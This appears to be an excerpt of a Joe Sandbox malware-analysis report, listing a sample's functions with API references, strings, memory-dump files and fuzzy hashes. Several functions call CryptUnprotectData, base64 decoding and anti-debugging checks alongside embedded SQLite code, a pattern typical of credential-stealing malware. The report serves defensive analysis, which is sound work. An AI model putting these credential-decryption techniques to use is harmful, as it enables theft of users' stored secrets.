Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95

Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BEA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
TerminateProcess.KERNEL32(00000000), ref: 0041BEE5

Strings

eM, xrefs: 0041BEBD

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: eM
API String ID: 2579439406-4107679315
Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D

Function 61E88FCA Relevance: 9.6, Strings: 7, Instructions: 866COMMON

Download Yara Rule

Strings

UNIQUE, xrefs: 61E899F4
sqlite_temp_master, xrefs: 61E89339
BINARY, xrefs: 61E896A2, 61E89791
invalid rootpage, xrefs: 61E89B28
index, xrefs: 61E890AB, 61E89217, 61E893FF
bua, xrefs: 61E89A13
sqlite_master, xrefs: 61E8932D

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: UNIQUE$BINARY$bua$index$invalid rootpage$sqlite_master$sqlite_temp_master
API String ID: 0-1733444394
Opcode ID: c992c50281e1d2a2ecb6a3a695e9d7902225fb130184855efa50adbf899f08fd
Instruction ID: c52f25025489653eb610d6e343a086c80a5a7374dd8721026aec1ef0af0b0df4
Opcode Fuzzy Hash: c992c50281e1d2a2ecb6a3a695e9d7902225fb130184855efa50adbf899f08fd
Instruction Fuzzy Hash: 1892F174E08255CFDB51CFA8C580B99BBF1BF89308F65C1A9E859AB352D734E881CB41

Function 61E56F18 Relevance: 9.6, APIs: 5, Strings: 1, Instructions: 606COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E57166

Strings

NEAR, xrefs: 61E57493

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID: NEAR
API String ID: 1475443563-1088024997
Opcode ID: f6a487f5c91de3cc1bef6fa6d898b170e9b402afe5ec80a6956fdd34adb5da4d
Instruction ID: b4e98ac7f2dea276e522b18a44adf406a464a3194d3be0cff96e2c83306ccf13
Opcode Fuzzy Hash: f6a487f5c91de3cc1bef6fa6d898b170e9b402afe5ec80a6956fdd34adb5da4d
Instruction Fuzzy Hash: 464234B4D08289CFDB80CFA8C18479DBBF1BB49308FA4C45AD8549B345D776E8A6CB51

Function 61E62CA3 Relevance: 9.1, Strings: 6, Instructions: 1622COMMON

Download Yara Rule

Strings

false, xrefs: 61E63127
NOCASE, xrefs: 61E63D79
2, xrefs: 61E630F0
u, xrefs: 61E63A4C
E, xrefs: 61E64125
BINARY, xrefs: 61E63D74

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: 2$BINARY$E$NOCASE$false$u
API String ID: 0-3666730823
Opcode ID: 44b2ffa57a66e06a5b41c824db9348c812c03fba735669014661c96b475b74fa
Instruction ID: 6b9246b4563a5e155af7b98e7ab84f845b82c0e831d1f7dba739a0367b6c7f33
Opcode Fuzzy Hash: 44b2ffa57a66e06a5b41c824db9348c812c03fba735669014661c96b475b74fa
Instruction Fuzzy Hash: 39F24774A442598FDB10CFA8C480B8DBBF5BF49318F65C169E858AB355D734EC86CB90

Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Strings

>O@, xrefs: 0040A224, 0040A231, 0040A249, 0040A268, 0040A234, 0040A26B

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: >O@
API String ID: 4291131564-3498640338
Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50

Function 61E19208 Relevance: 8.5, Strings: 6, Instructions: 967COMMON

Download Yara Rule

Strings

$, xrefs: 61E19687
NaN, xrefs: 61E19A67
, xrefs: 61E1A20D
Inf, xrefs: 61E1A717
-, xrefs: 61E195B8
-, xrefs: 61E1997C

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: $$$-$-$Inf$NaN
API String ID: 0-2883260867
Opcode ID: 028b7e2239e5b65ec7313dae655860b22c75c4cb4265c042bc54a10a851200c5
Instruction ID: 08ada5b9c357915bf8dc0511ebd4b169d1569d08758c0a6763b5a4183e8dfcc3
Opcode Fuzzy Hash: 028b7e2239e5b65ec7313dae655860b22c75c4cb4265c042bc54a10a851200c5
Instruction Fuzzy Hash: 8D92B370E4D2958EDB219B68C881398BBF1AB86344F34C4D9C49D9736AE735CAC9CF41

Function 61E9316A Relevance: 8.3, Strings: 6, Instructions: 804COMMON

Download Yara Rule

Strings

]a, xrefs: 61E932AB
A, xrefs: 61E9338F
bua, xrefs: 61E93379
snippet, xrefs: 61E931A7
ha, xrefs: 61E932B5
ma, xrefs: 61E932BF

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: A$]a$bua$ha$ma$snippet
API String ID: 0-4021802672
Opcode ID: d6770a0123dd894d56e0e9e880f92b69bc54195843cf986bada51ecccccb81b0
Instruction ID: b2623b0ed89b922f0be96898bd960c36401f43a5980a856a5f0c11e76d1438fa
Opcode Fuzzy Hash: d6770a0123dd894d56e0e9e880f92b69bc54195843cf986bada51ecccccb81b0
Instruction Fuzzy Hash: C392CF7490426ACFDB64CF69C884BC9B7B1BB48314F2486EAD85DAB250D7709EC5CF90

Function 61E86668 Relevance: 8.2, Strings: 6, Instructions: 719COMMON

Download Yara Rule

Strings

row , xrefs: 61E86EA4
non-unique entry in index , xrefs: 61E8700A
missing from index , xrefs: 61E86ED7
wrong # of entries in index , xrefs: 61E86DE9
q, xrefs: 61E86DD9
d, xrefs: 61E866B5

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: missing from index $d$non-unique entry in index $q$row $wrong # of entries in index
API String ID: 0-2434882124
Opcode ID: 7b4e3502c80a4384d77415debf17acac60d31245c151a2030a67de06a2fb1782
Instruction ID: 64764bd2453105caa9badb98113fecf854144ac2eeaebcc13dcf1322e2d74596
Opcode Fuzzy Hash: 7b4e3502c80a4384d77415debf17acac60d31245c151a2030a67de06a2fb1782
Instruction Fuzzy Hash: 5272E374A042898FDB50DFA8C59079DBBF1BB88304F20C56DE8A8AB395D775E942CF41

Function 61EAF900 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 61EAF94F
UnhandledExceptionFilter.KERNEL32 ref: 61EAF95F
GetCurrentProcess.KERNEL32 ref: 61EAF968
TerminateProcess.KERNEL32 ref: 61EAF979
abort.MSVCRT ref: 61EAF982

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
Instruction ID: c24ac7f06ebf37709200600ee493e26a75483ae19b01d267103323a56ae8c6ad
Opcode Fuzzy Hash: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
Instruction Fuzzy Hash: A911C0B5A14A04CFDB00EFB9D64861EBBF0EB5A304F548929E998CB311E774D9848F52

Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55

Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00

Strings

,<A, xrefs: 0041398D, 00413AE4, 00413AE7

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: ,<A
API String ID: 123533781-3158208111
Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50

Function 61EA0BA9 Relevance: 6.9, Strings: 5, Instructions: 655COMMON

Download Yara Rule

Strings

ASC, xrefs: 61EA138A
bua, xrefs: 61EA0CD2
bua, xrefs: 61EA139A
, xrefs: 61EA131C
DESC, xrefs: 61EA1392

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: $ASC$DESC$bua$bua
API String ID: 0-1029442847
Opcode ID: bf6a387133fc9ba796b2267b9702a36892ca5dcc5900f9bd3948313b72cb0120
Instruction ID: 8ab5de4e3564c360289137fee1b889a4ea914830ed3e88a553d2216b992680de
Opcode Fuzzy Hash: bf6a387133fc9ba796b2267b9702a36892ca5dcc5900f9bd3948313b72cb0120
Instruction Fuzzy Hash: 0852E2B4A053498FDB10CFA9C580A8EBBF1BF89304F25856DE899AB351D734E846CF51

Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9

Function 61E4E4BF Relevance: 5.0, APIs: 3, Instructions: 1300COMMON

